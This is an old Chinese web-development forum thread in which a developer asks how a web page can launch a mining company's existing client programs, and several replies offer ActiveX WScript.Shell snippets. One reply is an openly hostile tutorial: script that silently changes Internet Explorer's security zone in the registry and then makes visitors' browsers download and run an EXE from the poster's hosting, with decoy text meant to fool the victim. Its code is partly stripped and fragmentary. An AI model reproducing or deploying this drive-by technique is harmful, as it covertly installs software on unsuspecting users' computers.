急!!!请教一个问题!!

cumtcyq 2003-10-16 04:07:18
我现在要给一个矿里做一个信息查询管理系统,他们要求把安检信息,生产信息什么的都加到我这个系统里。他们原来的安检信息,生产信息。(这些信息原来有各自的系统,只是不能通过web来浏览,需要安装客户端),请问各位大侠,能不能在网页做成一个标记,掂击这个标记就会自动运行那些客户端呢?如能应该如何实现???
...全文
18 16 打赏 收藏 转发到动态 举报
写回复
用AI写文章
16 条回复
切换为时间正序
请发表友善的回复…
发表回复
cumtcyq 2003-10-19
  • 打赏
  • 举报
回复
是不是只能调用系统里的程序啊,而不能调用后来装的程序呢???我测试了vivisogood(新人类)大侠给的程序发现只有 (<BUTTON class=button onclick="Run('file:///D:/Program%20Files/Winamp/WINAMP.EXE')">WINAMP</BUTTON><br/>)这一个不能用(我改成别的程序也不能用),老弹出警告框,“找不到文件"'+strPath+'"(或它的组件之一)。请确定路径和文件名是否正确,而且所需的库文件均可用。”
yzxlyd 2003-10-17
  • 打赏
  • 举报
回复
up
xxrl 2003-10-17
  • 打赏
  • 举报
回复
哇 上面的说的够详细了
zykj_2000 2003-10-17
  • 打赏
  • 举报
回复
让IE6.0执行EXE文件的网页
 
说到要做一个让网页让IE6.0浏览的时候来执行空间下的一个EXE文件的方法要和以前写过的5.0的方法是完全不一样的了,5.0的总体思路是用一个HTML的文件带动一

个有错误开头的EML文件,让IE无条件的执行EML中的附件,可是当我们把IE升级到6.0的时候,再打开这个页面我们会发现WINDOWS会出现一个打开方式的界面,所以我们

前面做的针对IE5.0的是无效的。

下面我们来看看怎么让6.0来执行我们空间的同路径下的一个EXE文件,方法大致是当用户开启第一个HTML的页面时,通过恶意的HTML代码把IE安全级别里的默认的

“禁用下栽未签名的ActiveX控件”选项,变为“启用下栽未签名的ActiveX控件”,然后马上打开第二个HTML的文件内容是下载一个未签名的ActiveX控件,实质就是我们

所要执行的EXE文件,好了,下面我们来说说具体的制作步骤。

【第一步】建立一个1.HTM的文件,内容如下:






<SCRIPT>
document.write("");
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents.cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004",0,"REG_DWORD");
var expdate = new Date((new Date()).getTime() + (1));
documents.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();


<script language="javascript">




这里需要说明的是,其中“window.open('http://xiaomutou.diy.163.com/2.htm','colortext')”中的“http://xiaomutou.diy.163.com/2.htm”要改为你自己的

主页空间的路径,其中“setTimeout("opencolortext()",1500)”的“1500”是延时1.5秒中之后打开我们一会将要做的2.HTM文件。好,我们现在就来做这个2.HTM文

件,内容如下:




<SCRIPT language=javascript>
run_exe=""
run_exe+="
";
document.open();
document.clear();
document.writeln(run_exe);
document.close();





论坛连接中请勿终断....









说明,代码中“run_exe+="CODEBASE=\"3.exe#version=1,1,1,1\">" ”的“3.EXE”就是IE将来要执行的同路径下你的EXE文件

至于论坛连接中请勿终断,完全是迷惑对方的你自己可以变成自己的话。

好了现在将我们做的1.HTM、2.HTM和自己要对方执行的EXE文件一并上传到自己的主页空间下。

现在就让我们用IE6.0来直接浏览这个1.HTM的文件吧,当打开这个页面的1-2秒后应该自动打开另一个空白的页面,紧接着你的EXE文件将被执行,注意所放的EXE文件不要

过大,最好能控制在100K之内
zhanghao5188 2003-10-17
  • 打赏
  • 举报
回复
不難呀!!
1蓝天1 2003-10-17
  • 打赏
  • 举报
回复
up
vivisogood 2003-10-17
  • 打赏
  • 举报
回复
http://www.77tt.com/soft/show.asp?id=52
vivisogood 2003-10-17
  • 打赏
  • 举报
回复
客户端的exe:


<SCRIPT language=JavaScript>
function Run(strPath) {
exe.value=strPath;
try {
var objShell = new ActiveXObject("wscript.shell");
objShell.Run(strPath);
objShell = null;
}
catch (e){alert('找不到文件"'+strPath+'"(或它的组件之一)。请确定路径和文件名是否正确,而且所需的库文件均可用。')

}
}
</SCRIPT>

请输入要运行的程序:<br/><input name=exe type=text size=20 value="regedit"><BUTTON class=button onclick="Run(exe.value)">确定</BUTTON><BUTTON class=button onclick=exe.value="";>重新输入</BUTTON><br/>
<BUTTON class=button onclick="Run('notepad')">记事本</BUTTON><br/>
<BUTTON class=button onclick="Run('mspaint')">画图板</BUTTON><br/>
<BUTTON class=button onclick="Run('calc')">计算器</BUTTON><br/>
<BUTTON class=button onclick="Run('cmd')">cmd</BUTTON><br/>
<BUTTON class=button onclick="Run('Regedit')">Regedit</BUTTON><br/>
<BUTTON class=button onclick="Run('Msconfig')">Msconfig</BUTTON><br/>
<BUTTON class=button onclick="Run('file:///D:/Program%20Files/Winamp/WINAMP.EXE')">WINAMP</BUTTON><br/>
<BUTTON class=button onclick="Run('IEXPLORE.EXE')">IE</BUTTON><br/>
<BUTTON class=button onclick="Run('..')">..</BUTTON><br/>
<BUTTON class=button onclick="Run('%windir%')">%windir%</BUTTON><br/>
<BUTTON class=button onclick="Run('%temp%')">%temp%</BUTTON><br/>
vivisogood 2003-10-17
  • 打赏
  • 举报
回复
试试

Set MidShell = Server.CreateObject("WScript.Shell")

call MidShell .Run("run.exe", 1, True)

set MidShell =nothing
cumtcyq 2003-10-17
  • 打赏
  • 举报
回复
我按照上面做了,可是打不开啊
cumtcyq 2003-10-16
  • 打赏
  • 举报
回复
因为我以前没有做过,还请给一个示例,谢谢!!!
cumtcyq 2003-10-16
  • 打赏
  • 举报
回复
to:qdubit(qdubit)
能告诉我吗?虽然我现在的分不多,一旦实现,马上兑现!!!
qdubit 2003-10-16
  • 打赏
  • 举报
回复
可以的,我已经实现了。
hxy2003 2003-10-16
  • 打赏
  • 举报
回复
up
vivisogood 2003-10-16
  • 打赏
  • 举报
回复
应该可以。到历史帖子里面查找一下。记得有很多这样的问题。
cumtcyq 2003-10-16
  • 打赏
  • 举报
回复
在线等,请各位大侠不吝赐教!!!!

28,390

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧